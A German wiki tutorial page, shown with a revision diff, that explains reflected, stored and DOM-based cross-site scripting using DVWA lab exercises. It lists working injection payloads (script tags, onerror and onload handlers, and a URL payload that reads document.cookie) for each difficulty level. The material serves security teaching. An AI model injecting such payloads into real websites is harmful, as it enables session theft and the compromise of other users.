Cross-Site-Scripting Beispiele: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 37: Zeile 37:
  
 
=Stored XSS (Cross site scripting):SXSS=
 
=Stored XSS (Cross site scripting):SXSS=
Gespeichertes Cross-Site-Scripting (XSS) In diesem Fall wird der Hacker-Schadcode auf der Zielwebsite und dem Webserver gespeichert. wenn ein Angreifer bösartiges JavaScript in die Website senden kann und dieses Skript auf den Computern anderer Benutzer ausgeführt wird, das (XSS) Cross-Site-Scripting gespeichert wird
+
*Gespeichertes Cross-Site-Scripting (XSS)  
 +
*Der Hacker-Schadcode wird auf der Zielwebsite gespeichert.
 +
*Ein Angreifer sendet bösartiges JavaScript in die Website.
 +
*Dieses Skript wird auf den Computern anderer Benutzer ausgeführt.
 
==DVWA Low Level Stored XSS==
 
==DVWA Low Level Stored XSS==
 
===Firefox===
 
===Firefox===
Zeile 48: Zeile 51:
 
===Firefox===
 
===Firefox===
 
  Payload : <img src=x onerror=alert(document.domain)>
 
  Payload : <img src=x onerror=alert(document.domain)>
 
+
===Chromium===
 +
;Erzeugter Link
 +
*http://opfer:82/vulnerabilities/xss_s/
 
===DVWA High Level Stored XSS===
 
===DVWA High Level Stored XSS===
 
  Payload : <body onload=alert("bingo")>
 
  Payload : <body onload=alert("bingo")>

Version vom 26. Juli 2021, 18:06 Uhr

Original Artikel


Cross-Site-Scripting (XSS)

  • Technik, bei der Angreifer bösartige Skripte in eine Zielwebsite einschleusen
  • Es kann ihnen die Zugriffskontrolle auf die Website ermöglichen.
  • Gefahr besteht,wenn Benutzern die Eingabe von Daten Felder ohne Kontrollen ermöglicht wird.
  • Ein Angreifer kann dann auch ein Skript mit schädlichem Code einfügen.

ARTEN VON XSS

  • Reflektiertes XSS
  • Gespeichertes XSS
  • Dom-Basis XSS

Reflected XSS (Cross-Site-Scripting): RXSS

  • In diesem Fall werden keine Hackerdaten auf der Website gespeichert.
  • Der Code wird nur auf der Opferseite ausgeführt.
  • Hacker sendet ein Eingabeskript dieser Website, das dann an den Browser des Opfers reflektiert wird
  • Der Hacker lässt dann schädlichen JavaScript-Payload ausführen.

DVWA Low Level Reflected XSS

Firefox

Payload: <script>alert("xss")</script>

Xss-1.png

Chromium

Erzeugte Link

DVWA High Level Reflected XSS

Chromium

Payload: <img src=x onerror=alert("xinux")>

Xss-3.png

Firefox

Erzeugte Link

Stored XSS (Cross site scripting):SXSS

  • Gespeichertes Cross-Site-Scripting (XSS)
  • Der Hacker-Schadcode wird auf der Zielwebsite gespeichert.
  • Ein Angreifer sendet bösartiges JavaScript in die Website.
  • Dieses Skript wird auf den Computern anderer Benutzer ausgeführt.

DVWA Low Level Stored XSS

Firefox

Payload: <script>alert(document.domain)</script>

Xss-4.png

Chromium

Erzeugter Link

DVWA Medium Level Stored XSS

Firefox

Payload : <img src=x onerror=alert(document.domain)>

Chromium

Erzeugter Link

DVWA High Level Stored XSS

Payload : <body onload=alert("bingo")>

DOM BASE XSS

Der Cross-Site-Scripting-Angriff auf Dom Base (XSS) ist ein Kurzform-Dokumentobjektmodell-basiertes Cross-Site-Scripting. Das heißt, die HTTP-Antwort der Seite selbst ändert sich nicht. Ein Angreifer kann mehrere DOM-Objekte verwenden, um einen Cross-Site-Scripting-Angriff zu erstellen. Die beliebtesten Objekte aus dieser Perspektive sind document.URL, document.location und document.referrer.

DVWA low level DOM XSS

Payload: https://dvwa.willux.de/vulnerabilities/xss_d/?default=<script>alert("xinux 1")</script>

Xss-7.png

DVWA Medium level DOM BASE

Payload: https://dvwa.willux.de/vulnerabilities/xss_d/?default=English#<script>alert("xinux 2")</script>

and reload your browser.

Xss-8.png


DVWA HIGH LEVEL DOM BASE

Payload: https://dvwa.willux.de/vulnerabilities/xss_d/?default=English#<script>alert(document.cookie)</script>

and reload browser.

Xss-9.png

Reference

https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS).html https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/part2/xss.html